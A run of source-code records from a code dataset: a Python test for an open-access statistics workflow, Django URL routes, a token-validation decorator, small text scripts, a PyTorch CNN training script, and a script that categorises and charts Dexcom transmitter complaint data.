},\n \"years\": [\n {\n \"year\": 2020,\n \"date\": \"2020-12-31\",\n \"stats\": {\n \"n_citations\": 121,\n \"n_outputs\": 100,\n \"n_outputs_open\": 48,\n \"n_outputs_publisher_open\": 37,\n \"n_outputs_publisher_open_only\": 11,\n \"n_outputs_both\": 26,\n \"n_outputs_other_platform_open\": 37,\n \"n_outputs_other_platform_open_only\": 11,\n \"n_outputs_closed\": 52,\n \"n_outputs_black\": 90,\n \"n_outputs_oa_journal\": 19,\n \"n_outputs_hybrid\": 10,\n \"n_outputs_no_guarantees\": 8,\n \"n_outputs_preprint\": 10,\n \"n_outputs_domain\": 27,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 48.0,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 11.0,\n \"p_outputs_both\": 26.0,\n \"p_outputs_other_platform_open\": 37.0,\n \"p_outputs_other_platform_open_only\": 11.0,\n \"p_outputs_closed\": 52.0,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 51.35135135135135,\n \"p_outputs_hybrid\": 27.027027027027028,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 27.027027027027028,\n \"p_outputs_domain\": 72.97297297297297,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n },\n },\n {\n \"year\": 2021,\n \"date\": \"2021-12-31\",\n \"stats\": {\n \"n_citations\": 233,\n \"n_outputs\": 100,\n \"n_outputs_open\": 45,\n \"n_outputs_publisher_open\": 37,\n \"n_outputs_publisher_open_only\": 14,\n \"n_outputs_both\": 23,\n \"n_outputs_other_platform_open\": 31,\n \"n_outputs_other_platform_open_only\": 8,\n \"n_outputs_closed\": 55,\n \"n_outputs_black\": 90,\n \"n_outputs_oa_journal\": 20,\n \"n_outputs_hybrid\": 9,\n \"n_outputs_no_guarantees\": 8,\n \"n_outputs_preprint\": 10,\n \"n_outputs_domain\": 27,\n \"n_outputs_institution\": 0,\n \"n_outputs_public\": 0,\n \"n_outputs_other_internet\": 0,\n \"p_outputs_open\": 45.0,\n \"p_outputs_publisher_open\": 37.0,\n \"p_outputs_publisher_open_only\": 14.000000000000002,\n \"p_outputs_both\": 23.0,\n \"p_outputs_other_platform_open\": 31.0,\n \"p_outputs_other_platform_open_only\": 8.0,\n \"p_outputs_closed\": 55.00000000000001,\n \"p_outputs_black\": 90.0,\n \"p_outputs_oa_journal\": 54.054054054054056,\n \"p_outputs_hybrid\": 24.324324324324326,\n \"p_outputs_no_guarantees\": 21.62162162162162,\n \"p_outputs_preprint\": 32.25806451612903,\n \"p_outputs_domain\": 87.09677419354838,\n \"p_outputs_institution\": 0.0,\n \"p_outputs_public\": 0.0,\n \"p_outputs_other_internet\": 0.0,\n },\n },\n ],\n \"repositories\": repositories,\n }\n ]\n\n for e_dict, a_entity in zip(expected, entities):\n a_dict = a_entity.to_dict()\n self.assertDictEqual(e_dict, a_dict)\n\n def test_save_entities(self):\n with CliRunner().isolated_filesystem() as t:\n for entity_type, index, data, entity_ids in self.entities:\n # Read data\n df_index = pd.DataFrame(index)\n preprocess_index_df(entity_type, df_index)\n\n df_data = pd.DataFrame(data)\n preprocess_data_df(entity_type, df_data)\n\n # Save entities\n df_index = make_index_df(entity_type, df_index, df_data)\n entities = make_entities(entity_type, df_index, df_data)\n path = os.path.join(t, \"data\", entity_type)\n save_entities(path, entities)\n\n # Check that entity json files are saved\n for entity_id in entity_ids:\n file_path = os.path.join(path, f\"{entity_id}.json\")\n print(f\"Assert exists: {file_path}\")\n self.assertTrue(os.path.isfile(file_path))\n\n\ndef make_expected_build_files(base_path: str) -> List[str]:\n countries = 
[\"AUS\", \"NZL\"]\n institutions = [\"03b94tp07\", \"02n415q13\"] # Auckland, Curtin\n categories = [\"country\"] * len(countries) + [\"institution\"] * len(institutions)\n entity_ids = countries + institutions\n expected = []\n\n # Add base data files\n data_path = os.path.join(base_path, \"data\")\n file_names = [\"stats.json\", \"country.json\", \"institution.json\", \"index.json\"]\n for file_name in file_names:\n expected.append(os.path.join(data_path, file_name))\n\n # Add country and institution specific data files\n for entity_type, entity_id in zip(categories, entity_ids):\n path = os.path.join(data_path, entity_type, f\"{entity_id}.json\")\n expected.append(path)\n\n # Add logos\n for entity_type, entity_id in zip(categories, entity_ids):\n for size in [\"sm\", \"md\", \"lg\"]:\n if entity_type == \"country\" and size == \"lg\":\n continue\n\n file_type = \"svg\"\n if entity_type == \"institution\":\n file_type = \"jpg\"\n if size == \"lg\":\n file_type = \"png\"\n\n path = os.path.join(base_path, \"images\", \"logos\", entity_type, size, f\"{entity_id}.{file_type}\")\n expected.append(path)\n\n return expected\n","sub_path":"academic_observatory_workflows/workflows/tests/test_oa_web_workflow.py","file_name":"test_oa_web_workflow.py","file_ext":"py","file_size_in_byte":58361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"241424940","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.login_view, name='login_view'),\n path('ttt/', views.tesst, name='tesst'),\n path('register/', views.home_view, name='home_view'),\n path('/tes/', views.tes, name='tes'),\n path('/tes2/', views.tes2, name='tes2'),\n path('/register-courses/', views.to_regCourses, name='register-courses'),\n path('/registered-courses/', views.regCourses, name='registered-courses'),\n path('//register/', views.regcourseview, name='register'),\n]\n","sub_path":"Profiler/Profiler1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"149074370","text":"from access_tokens import tokens\nfrom django.http import Http404\nfrom django.conf import settings\n\n\ndef validate_token(function):\n def wrap(request, *args, **kwargs):\n token = kwargs.get('token')\n case_id = kwargs.get('case_id')\n validate = tokens.validate(\n token, scope=(), key=case_id,\n salt=settings.TOKEN_SALT, max_age=None\n )\n if validate:\n return function(request, *args, **kwargs)\n else:\n raise Http404\n return wrap\n","sub_path":"casereport/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"530244228","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 3 22:57:08 2020\n\n@author: viktor\n\"\"\"\n\nn=int(input(\"\"))\nx=1\nc=1\nprint(1)\nif n>1:\n while x text.txt\n# to get a list sorted by frequency:\n# python3 frequency.py < ru_pud-ud-test.conllu | sort -nr > text.txt\n# or it's also possible to use the for loop you advised, but I had\n# difficulty using your code as I kept warning 'list indices must be integers or slices, not tuple'\n# so I wrote the same with the format function\n\n\nfreq = []\n\nfor w in vocab:\n\tfreq.append((vocab[w], w))\n\n# freq.sort(reverse=True)\n\nfor i in freq:\n\tprint ('{}\\t{}'.format(i[0], i[1]))\n\n# now I have a unique word list 
arranged by frequency\n","sub_path":"2018-komp-ling/practicals/translit/frequency.py","file_name":"frequency.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"585673755","text":"import numpy as np\nimport sys\nimport torch\nimport torch.nn as nn\nfrom torch.optim import Adam\nimport torch.utils.data as Data\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\nfrom torchvision import transforms as tf\nimport Model\n\n# parameters\nEPOCH = 1\nBATCH_SIZE = 256\nLEARNING_RATE = 0.001\n\ndef flipped_data(imgs, y):\n new_imgs = imgs.copy()\n new_y = y.copy()\n num_data = new_imgs.shape[0]\n for i in range(num_data):\n new_imgs[i,0,:,:] = new_imgs[i,0,:,::-1]\n return new_imgs, new_y\n\ndef parse_csv(label_path):\n raw_data_fp = open(label_path,'r')\n lines = raw_data_fp.readlines()[1:]\n num_data = len(lines)\n\n raw_imgs = np.empty(shape=(num_data,1,48*48), dtype=float)\n raw_y = np.zeros(shape=(num_data),dtype=np.int64)\n for i, line in enumerate(lines):\n nums = line.split(',')\n raw_y[i] = int(nums[0])\n raw_imgs[i,:,:] = np.array([float(num) for num in nums[1].split(' ')]) /255.0\n \n raw_imgs = raw_imgs.reshape((num_data,1,48,48))\n \n return raw_imgs, raw_y\n '''\ndef augment_data(r_imgs, r_y):\n #f_imgs, f_y = flipped_data(r_imgs, r_y)\n #imgs = np.concatenate((r_imgs, f_imgs), axis=0)\n imgs = torch.tensor(imgs).type(torch.FloatTensor)\n #y = np.concatenate((r_y, f_y), axis=0)\n y = torch.tensor(y).type(torch.LongTensor)\n transform = tf.Compose([\n tf.ToPILImage(),\n tf.ColorJitter(brightness=0.4, contrast=0.3, saturation=0.3, hue=0.3), \n tf.RandomHorizontalFlip(),\n tf.RandomRotation(30),\n tf.RandomResizedCrop(48,scale=(0.85,1)),\n tf.ToTensor()\n ])\n aug_imgs1 = imgs.clone()\n for i in range(imgs.size()[0]):\n aug_imgs1[i, :, :, :] = transform(aug_imgs1[i])\n aug_imgs2 = imgs.clone()\n for i in range(imgs.size()[0]):\n aug_imgs2[i, :, :, :] = transform(aug_imgs2[i])\n imgs = torch.cat((imgs,aug_imgs1, aug_imgs2), 0)\n y = torch.cat((y, y, y), 0)\n #imgs = torch.cat((imgs,aug_imgs1), 0)\n #y = torch.cat((y, y), 0)\n print(imgs.size(), y.size())\n return imgs, y\n '''\nclass TrainDataset(Dataset):\n def __init__(self, raw_imgs, raw_y):\n aug_imgs, aug_y = flipped_data(raw_imgs, raw_y)\n imgs = np.concatenate((raw_imgs, aug_imgs), axis=0)\n self.imgs = torch.tensor(imgs).type(torch.FloatTensor)\n y = np.concatenate((raw_y, aug_y), axis=0)\n self.y = torch.tensor(y).type(torch.LongTensor)\n self.transform = tf.Compose([\n tf.ToPILImage(),\n tf.ColorJitter(brightness=0.4, contrast=0.4, saturation=0.4),\n tf.RandomRotation(30), \n tf.RandomResizedCrop(48,scale=(0.8,1)),\n tf.ToTensor()\n ])\n def __len__(self):\n return len(self.imgs)\n\n def __getitem__(self, idx):\n #return self.imgs[idx], self.y[idx]\n return self.transform(self.imgs[idx]).type(torch.FloatTensor), self.y[idx]\n\nif __name__ == \"__main__\":\n raw_imgs, raw_y = parse_csv(sys.argv[1])\n imgs_shape = raw_imgs.shape\n y_shape = raw_y.shape\n c = np.concatenate((raw_imgs.reshape(len(raw_imgs), -1), raw_y.reshape(len(raw_y),1)), axis=1)\n np.random.shuffle(c)\n raw_imgs = (c[:, :-1]).reshape(imgs_shape)\n raw_y = (c[:, -1]).reshape(y_shape)\n \n num_val_data = 0#raw_imgs.shape[0] // 12\n val_imgs = raw_imgs[:num_val_data,:,:]\n val_y = raw_y[:num_val_data]\n\n train_imgs = raw_imgs[num_val_data:,:,:,:]\n train_y = raw_y[num_val_data:]\n a = train_imgs.shape[0]\n\n training_set = 
TrainDataset(train_imgs, train_y)\n val_set = Data.TensorDataset(\n torch.tensor(val_imgs).type(torch.FloatTensor), \n torch.tensor(val_y).type(torch.LongTensor))\n train_loader = DataLoader(\n training_set, batch_size=BATCH_SIZE, shuffle=True, num_workers=4)\n val_loader = DataLoader(val_set, batch_size=BATCH_SIZE, shuffle=False)\n \n # train\n device = torch.device('cuda')\n model = Model.MyCNN()\n try:\n model.load_state_dict(torch.load('model_params.pkl'))\n print('use exist parameters')\n except:\n print('new model, no exist parameters')\n pass\n model.to(device)\n optimizer = Adam(model.parameters(), lr=LEARNING_RATE)\n loss_func = nn.CrossEntropyLoss()\n\n print('start training...')\n model.train()\n\n high_val_acc = 0.67\n for epoch in range(EPOCH):\n train_loss, train_acc = [], []\n torch.cuda.empty_cache()\n for step, (img, target) in enumerate(train_loader):\n #print(img.size(), target.size()) \n img_cuda = img.to(device, dtype=torch.float)\n target_cuda = target.to(device)\n\n optimizer.zero_grad()\n output = model(img_cuda)\n #print(output.size(), target_cuda.size())\n loss = loss_func(output, target_cuda)\n loss.backward()\n optimizer.step()\n\n predict = torch.max(output, 1)[1]\n acc = np.mean((target_cuda == predict).cpu().numpy())\n train_acc.append(acc)\n train_loss.append(loss.item())\n acc = np.mean(train_acc)\n val_acc = 0\n if num_val_data > 0:\n model.eval()\n for _, (img, target) in enumerate(val_loader):\n img_cuda = img.to(device, dtype=torch.float)\n target_cuda = target.to(device)\n output = model(img_cuda)\n predict = torch.max(output, 1)[1]\n val_acc += np.sum((target_cuda == predict).cpu().numpy())\n val_acc /= val_set.__len__()\n if val_acc > high_val_acc:\n high_val_acc = val_acc\n torch.save(model.state_dict(), 'model_params.pkl')\n print('saved new parameters')\n model.train()\n if epoch % 10 == 0:\n torch.save(model.state_dict(), 'model_params.pkl')\n print('saved new parameters')\n print(\"Epoch: {}| Loss: {:.4f}| Acc: {:.4f}| Val Acc: {:.4f}\"\\\n .format(epoch + 1, np.mean(train_loss), acc, val_acc))\n \n model.eval()\n # save parameters\n # torch.save(model, 'model.pkl') # entire net\n torch.save(model.state_dict(), 'model_params.pkl') # parameters\n \n\n","sub_path":"hw3/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17669339","text":"import glob\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport seaborn as sns\nimport subprocess\nimport sys\nimport textwrap\nsys.path.append(os.path.expandvars(r'%UserProfile%\\Desktop\\Development\\_libs'))\nfrom AgileExportProcessor.modules.agile_export_processor import AgileExportProcessor\nfrom DexcomMappings.modules.codes import Codes\nfrom DexcomMappings.modules.products import Product\nfrom PeriodicReports.periodic_reports import PeriodicReport\nfrom collections import OrderedDict\nfrom jinja2 import Environment\nfrom jinja2 import FileSystemLoader\n\nprod = Product()\ncodes = Codes()\n\n\ndef work(pr):\n # Process exports\n aep = AgileExportProcessor(glob.glob(os.path.join(pr.working_directory, 'Periodic Reports*.csv')))\n\n # Import Shipments Data\n g5_tx_1_2_sns = pd.read_csv(os.path.join(pr.working_directory, 'shipments/serial_number-lot_number_shipment_tracking.csv'),\n low_memory=False, usecols=['Serial Number'])['Serial Number'].unique()\n\n # Get problem_reports dataframe\n problem_reports = aep.get_problem_reports().copy()\n\n # 
Limit to G5 Transmitter complaints only\n problem_reports = problem_reports[problem_reports.product_line.isin(prod.tags_search('G5 & Transmitter'))]\n problem_reports['product_type'] = 'G5 Transmitter'\n\n # Limit to complaints only\n problem_reports = problem_reports[problem_reports.problem_code.isin(codes.complaint_classification_codes())].copy()\n\n # Extract transmitter serial number\n problem_reports['ex_transmitter_sn'] = AgileExportProcessor.determine_transmitter_serial_number(problem_reports, complaint_deep_search=True)\n\n # Determine if 1.2 TX\n problem_reports.loc[pd.notnull(problem_reports.ex_transmitter_sn), 'is_1.2_tx'] = problem_reports.ex_transmitter_sn.isin(g5_tx_1_2_sns)\n\n # Categories\n problem_reports.loc[(problem_reports.problem_code.isin([3008,4001,5011,5012,5013,5017,5018,5018,5019,5020,5021,5023,5024,5102,5104])), 'bucket'] = problem_reports.problem_code_and_summary.str.extract('.+? (.+)', expand=False)\n problem_reports.loc[(problem_reports.problem_code == 42), 'bucket'] = \"???'s / Hourglass\"\n problem_reports.loc[(problem_reports.problem_code.isin([25, 46])), 'bucket'] = \"Adhesive Issue\"\n problem_reports.loc[(problem_reports.problem_code.isin([52, 80, 81, 82, 83, 85])), 'bucket'] = \"Audio and Vibration\"\n problem_reports.loc[(problem_reports.problem_code.isin([28, 30, 41])), 'bucket'] = \"Battery Charge Issue\"\n problem_reports.loc[(problem_reports.problem_code.isin([49, 2015])), 'bucket'] = \"Buttons Issue\"\n problem_reports.loc[(problem_reports.problem_code.isin([1, 23, 65, 66, 67, 68, 112])), 'bucket'] = \"Calibration Issues\"\n problem_reports.loc[(problem_reports.problem_code.isin([6, 7, 115, 3005, 3006, 5010, 5015, 5016])), 'bucket'] = \"Connectivity Issues\"\n problem_reports.loc[(problem_reports.problem_code.isin([10, 47])), 'bucket'] = \"Difficulty Inserting Sensor/Transmitter\"\n problem_reports.loc[(problem_reports.problem_code.isin([31, 51, 53])), 'bucket'] = \"Display Issue\"\n problem_reports.loc[(problem_reports.problem_code.isin([37, 70, 114])), 'bucket'] = \"Error Icon\"\n problem_reports.loc[(problem_reports.problem_code.isin([71])), 'bucket'] = \"Failed Sensor after Calibration\"\n problem_reports.loc[(problem_reports.problem_code.isin([13])), 'bucket'] = \"Failed Sensor before Calibration\"\n problem_reports.loc[(problem_reports.problem_code.isin([40, 50])), 'bucket'] = \"Firmware-related\"\n problem_reports.loc[(problem_reports.problem_code.isin([12])), 'bucket'] = \"Inaccuracies\"\n problem_reports.loc[(problem_reports.problem_code.isin([89])), 'bucket'] = \"Low TX Battery\"\n problem_reports.loc[(problem_reports.problem_code.isin([113, 2009])), 'bucket'] = \"Pairing Issues\"\n problem_reports.loc[(problem_reports.problem_code.isin([24,32,45,88,94,95,96,105,106,108,3001,3003,3004,5000,5001,5002,5006,5008,5009,3500,4000,5014,5100,4002])), 'bucket'] = \"Other\"\n problem_reports.loc[(problem_reports.problem_code.isin([9, 17, 36, 48, 73, 76, 77, 91, 97, 109, 110, 2010, 2011, 2013, 2014])), 'bucket'] = \"Physical Damage\"\n problem_reports.loc[(problem_reports.problem_code.isin([20, 21, 22, 75, 1502])), 'bucket'] = \"Physiological\"\n problem_reports.loc[(problem_reports.problem_code.isin([29, 111])), 'bucket'] = \"Receiver Won't Turn On/Ceases to Function\"\n problem_reports.loc[(problem_reports.problem_code.isin([90])), 'bucket'] = \"Transmitter Failed Icon\"\n\n # Generation\n problem_reports['generation'] = 'G5 Transmitter'\n\n # Generate dataframes\n def generate_dfs(start_date, end_date):\n ''' Generates three dataframes: one 
with full pivot, one without Low TX Battery, and one without Pairing Issues.'''\n tx_buckets = [\"Low TX Battery\", \"Pairing Issues\", \"Connectivity Issues\", \"Transmitter Failed Icon\", \"Physical Damage\"]\n\n problem_reports_pivot = problem_reports.copy()\n\n problem_reports_pivot.loc[~problem_reports_pivot.bucket.isin(tx_buckets), 'bucket'] = 'Other'\n date_of_issue_selector = (problem_reports_pivot.date_of_issue >= start_date) & (problem_reports_pivot.date_of_issue < end_date)\n \n # Get unknown counts\n all_unknown_tx_sn_count = len(problem_reports_pivot[date_of_issue_selector & pd.isnull(problem_reports.ex_transmitter_sn)])\n without_low_tx_battery_unknown_tx_sn_count = len(problem_reports_pivot[date_of_issue_selector & pd.isnull(problem_reports.ex_transmitter_sn) & (problem_reports.bucket != 'Low TX Battery')])\n without_pairing_issues_unknown_tx_sn_count = len(problem_reports_pivot[date_of_issue_selector & pd.isnull(problem_reports.ex_transmitter_sn) & (problem_reports.bucket != 'Pairing Issues')])\n \n # Generate full pivot\n problem_reports_pivot = problem_reports_pivot[date_of_issue_selector].set_index('date_of_issue').groupby(['bucket', 'is_1.2_tx']).size().unstack(level=1).fillna(0)\n problem_reports_pivot.columns.name = None\n problem_reports_pivot.columns = ['Not G5 TX 1.2 (Qty)', 'G5 TX 1.2 (Qty)']\n\n problem_reports_pivot = problem_reports_pivot.sort_values('G5 TX 1.2 (Qty)', ascending=False)\n \n fractions_df = problem_reports_pivot / problem_reports_pivot.sum(axis=0)\n fractions_df = fractions_df.rename(columns = {'G5 TX 1.2 (Qty)': 'G5 TX 1.2 (Rate)', 'Not G5 TX 1.2 (Qty)': 'Not G5 TX 1.2 (Rate)'})\n fractions_df['variance'] = fractions_df['G5 TX 1.2 (Rate)'] - fractions_df['Not G5 TX 1.2 (Rate)']\n\n all_pivot = pd.concat([problem_reports_pivot, fractions_df], axis=1)\n \n all_pivot = all_pivot.loc[tx_buckets + ['Other',]].fillna(0).astype('float')\n \n # Generate pivot without Low TX Battery\n without_low_tx_battery_pivot = all_pivot.copy()\n\n without_low_tx_battery_pivot = without_low_tx_battery_pivot.loc[without_low_tx_battery_pivot.index != 'Low TX Battery']\n\n without_low_tx_battery_pivot['Not G5 TX 1.2 (Rate)'] = without_low_tx_battery_pivot['Not G5 TX 1.2 (Qty)'] / without_low_tx_battery_pivot['Not G5 TX 1.2 (Qty)'].sum()\n without_low_tx_battery_pivot['G5 TX 1.2 (Rate)'] = without_low_tx_battery_pivot['G5 TX 1.2 (Qty)'] / without_low_tx_battery_pivot['G5 TX 1.2 (Qty)'].sum()\n without_low_tx_battery_pivot['variance'] = without_low_tx_battery_pivot['G5 TX 1.2 (Rate)'] - without_low_tx_battery_pivot['Not G5 TX 1.2 (Rate)']\n \n without_low_tx_battery_pivot = without_low_tx_battery_pivot.loc[[i for i in tx_buckets if i != 'Low TX Battery'] + ['Other',]].fillna(0).astype('float')\n \n # Generate pivot without Pairing Issues\n without_pairing_failed_pivot = all_pivot.copy()\n\n without_pairing_failed_pivot = without_pairing_failed_pivot.loc[without_pairing_failed_pivot.index != 'Pairing Issues']\n\n without_pairing_failed_pivot['Not G5 TX 1.2 (Rate)'] = without_pairing_failed_pivot['Not G5 TX 1.2 (Qty)'] / without_pairing_failed_pivot['Not G5 TX 1.2 (Qty)'].sum()\n without_pairing_failed_pivot['G5 TX 1.2 (Rate)'] = without_pairing_failed_pivot['G5 TX 1.2 (Qty)'] / without_pairing_failed_pivot['G5 TX 1.2 (Qty)'].sum()\n without_pairing_failed_pivot['variance'] = without_pairing_failed_pivot['G5 TX 1.2 (Rate)'] - without_pairing_failed_pivot['Not G5 TX 1.2 (Rate)']\n\n without_pairing_failed_pivot = without_pairing_failed_pivot.loc[[i for i in tx_buckets if i 
!= 'Pairing Issues'] + ['Other',]].fillna(0).astype('float')\n\n return all_pivot, without_low_tx_battery_pivot, without_pairing_failed_pivot, all_unknown_tx_sn_count, without_low_tx_battery_unknown_tx_sn_count, without_pairing_issues_unknown_tx_sn_count\n\n def generate_visualizations(all_pivot, without_low_tx_battery_pivot, without_pairing_failed_pivot, date_range_prefix):\n '''Generate pie charts.'''\n plt.close('all')\n sns.set_context('paper')\n matplotlib.rc('font', **{'family': 'serif', 'weight': 'normal', 'size': 10})\n\n def generate_fig(df, category_prefix):\n fig, (ax1, ax2) = plt.subplots(figsize=(7.5, 3), nrows=1, ncols=2)\n\n ax1.set_title('Not G5 TX 1.2\\nTotal Complaints = {:,}'.format(df['Not G5 TX 1.2 (Qty)'].sum()))\n patches, labels, autopcts = ax1.pie(x = df['Not G5 TX 1.2 (Qty)'], labels = [textwrap.fill(i, 25) for i in df.index], \n colors = sns.color_palette('colorblind'), autopct = '%1.1f%%', counterclock = True, \n pctdistance = 0.86, labeldistance=1.05)\n for i in labels:\n i.set_fontsize('xx-small')\n for i in autopcts:\n i.set_fontsize('xx-small')\n ax1.axis('equal')\n\n ax2.set_title('G5 TX 1.2\\nTotal Complaints = {:,}'.format(df['G5 TX 1.2 (Qty)'].sum()))\n patches, labels, autopcts = ax2.pie(x = df['G5 TX 1.2 (Qty)'], labels = [textwrap.fill(i, 25) for i in df.index], \n colors = sns.color_palette('colorblind'), autopct = '%1.1f%%', counterclock = True, \n pctdistance = 0.86, labeldistance=1.05)\n for i in labels:\n i.set_fontsize('xx-small')\n for i in autopcts:\n i.set_fontsize('xx-small')\n ax2.axis('equal')\n\n fig.savefig(os.path.join(pr.working_directory, '{}_{}.pdf'.format(date_range_prefix, category_prefix)), dpi=150, bbox_inches='tight')\n\n generate_fig(all_pivot, 'full')\n generate_fig(without_low_tx_battery_pivot, 'without_low_tx_battery')\n generate_fig(without_pairing_failed_pivot, 'without_pairing_failed')\n\n # All Dates\n all_pivot_full, without_low_tx_battery_pivot_full, without_pairing_failed_pivot_full, all_unknown_tx_sn_count_full, without_low_tx_battery_unknown_tx_sn_count_full, without_pairing_issues_unknown_tx_sn_count_full = \\\n generate_dfs('2016-10-01', pd.to_datetime(pr.export_date.tz_localize(None)))\n generate_visualizations(all_pivot_full, without_low_tx_battery_pivot_full, without_pairing_failed_pivot_full, 'all_dates')\n\n # November 2016\n all_pivot_nov_2016, without_low_tx_battery_pivot_nov_2016, without_pairing_failed_pivot_nov_2016, all_unknown_tx_sn_count_nov_2016, \\\n without_low_tx_battery_unknown_tx_sn_count_nov_2016, without_pairing_issues_unknown_tx_sn_count_nov_2016 = \\\n generate_dfs('2016-11-01', '2016-12-01')\n generate_visualizations(all_pivot_nov_2016, without_low_tx_battery_pivot_nov_2016, without_pairing_failed_pivot_nov_2016, 'nov_2016')\n\n # December 2016\n all_pivot_dec_2016, without_low_tx_battery_pivot_dec_2016, without_pairing_failed_pivot_dec_2016, all_unknown_tx_sn_count_dec_2016, \\\n without_low_tx_battery_unknown_tx_sn_count_dec_2016, without_pairing_issues_unknown_tx_sn_count_dec_2016 = \\\n generate_dfs('2016-12-01', '2017-01-01')\n generate_visualizations(all_pivot_dec_2016, without_low_tx_battery_pivot_dec_2016, without_pairing_failed_pivot_dec_2016, 'dec_2016')\n\n # January 2017\n all_pivot_jan_2017, without_low_tx_battery_pivot_jan_2017, without_pairing_failed_pivot_jan_2017, all_unknown_tx_sn_count_jan_2017, \\\n without_low_tx_battery_unknown_tx_sn_count_jan_2017, without_pairing_issues_unknown_tx_sn_count_jan_2017 = \\\n generate_dfs('2017-01-01', '2017-02-01')\n 
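# The eight monthly sections below are identical apart from their date windows; an\n    # equivalent, shorter form (a sketch, not the author's original code) would loop over\n    # month starts, e.g. for start in pd.date_range('2016-11-01', '2017-06-01', freq='MS'):\n    #     end = start + pd.offsets.MonthBegin(1)\n    # The expanded form is kept because the report template references each variable by name.\n    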
generate_visualizations(all_pivot_jan_2017, without_low_tx_battery_pivot_jan_2017, without_pairing_failed_pivot_jan_2017, 'jan_2017')\n\n # February 2017\n all_pivot_feb_2017, without_low_tx_battery_pivot_feb_2017, without_pairing_failed_pivot_feb_2017, all_unknown_tx_sn_count_feb_2017, \\\n without_low_tx_battery_unknown_tx_sn_count_feb_2017, without_pairing_issues_unknown_tx_sn_count_feb_2017 = \\\n generate_dfs('2017-02-01', '2017-03-01')\n generate_visualizations(all_pivot_feb_2017, without_low_tx_battery_pivot_feb_2017, without_pairing_failed_pivot_feb_2017, 'feb_2017')\n\n # March 2017\n all_pivot_mar_2017, without_low_tx_battery_pivot_mar_2017, without_pairing_failed_pivot_mar_2017, all_unknown_tx_sn_count_mar_2017, \\\n without_low_tx_battery_unknown_tx_sn_count_mar_2017, without_pairing_issues_unknown_tx_sn_count_mar_2017 = \\\n generate_dfs('2017-03-01', '2017-04-01')\n generate_visualizations(all_pivot_mar_2017, without_low_tx_battery_pivot_mar_2017, without_pairing_failed_pivot_mar_2017, 'mar_2017')\n\n # April 2017\n all_pivot_apr_2017, without_low_tx_battery_pivot_apr_2017, without_pairing_failed_pivot_apr_2017, all_unknown_tx_sn_count_apr_2017, \\\n without_low_tx_battery_unknown_tx_sn_count_apr_2017, without_pairing_issues_unknown_tx_sn_count_apr_2017 = \\\n generate_dfs('2017-04-01', '2017-05-01')\n generate_visualizations(all_pivot_apr_2017, without_low_tx_battery_pivot_apr_2017, without_pairing_failed_pivot_apr_2017, 'apr_2017')\n\n # May 2017\n all_pivot_may_2017, without_low_tx_battery_pivot_may_2017, without_pairing_failed_pivot_may_2017, all_unknown_tx_sn_count_may_2017, \\\n without_low_tx_battery_unknown_tx_sn_count_may_2017, without_pairing_issues_unknown_tx_sn_count_may_2017 = \\\n generate_dfs('2017-05-01', '2017-06-01')\n generate_visualizations(all_pivot_may_2017, without_low_tx_battery_pivot_may_2017, without_pairing_failed_pivot_may_2017, 'may_2017')\n\n # June 2017\n all_pivot_jun_2017, without_low_tx_battery_pivot_jun_2017, without_pairing_failed_pivot_jun_2017, all_unknown_tx_sn_count_jun_2017, \\\n without_low_tx_battery_unknown_tx_sn_count_jun_2017, without_pairing_issues_unknown_tx_sn_count_jun_2017 = \\\n generate_dfs('2017-06-01', '2017-07-01')\n generate_visualizations(all_pivot_jun_2017, without_low_tx_battery_pivot_jun_2017, without_pairing_failed_pivot_jun_2017, 'jun_2017')\n\n # Weekly trending of top 4 issues\n dates_to_plot = pd.date_range(start='2016-10-01', end=pd.to_datetime(pr.export_date.tz_localize(None)), freq='W-SUN')\n issues_to_plot = ['Low TX Battery', 'Pairing Issues', 'Connectivity Issues', 'Transmitter Failed Icon']\n\n vis_2_pivot = problem_reports[~pd.isnull(problem_reports.date_of_issue) & (problem_reports['is_1.2_tx'] == True)].set_index('date_of_issue').groupby([pd.TimeGrouper('W-SUN'), 'bucket']).size().\\\n reindex(issues_to_plot, level=1).unstack(level=1).reindex(dates_to_plot).fillna(0)\n\n vis_2_pivot.index = [(i + pd.Timedelta(days=-6)).strftime('%m/%d') + ' - ' + i.strftime('%m/%d') for i in vis_2_pivot.index]\n vis_2_pivot['Sum'] = vis_2_pivot.sum(axis=1)\n\n # Bar chart\n plt.close('all')\n\n sns.set_context('paper')\n sns.set_style('darkgrid')\n matplotlib.rc('font', **{'family': 'serif', 'weight': 'normal', 'size': 10})\n matplotlib.rc('xtick', **{'labelsize': 'x-small'})\n matplotlib.rc('ytick', **{'labelsize': 'x-small'})\n\n fig, ax = plt.subplots(figsize=(7.5, 5))\n\n ind = range(len(vis_2_pivot))\n\n bar_containers = []\n for row_idx, column in enumerate(vis_2_pivot.columns[0:-1]):\n bar_container = 
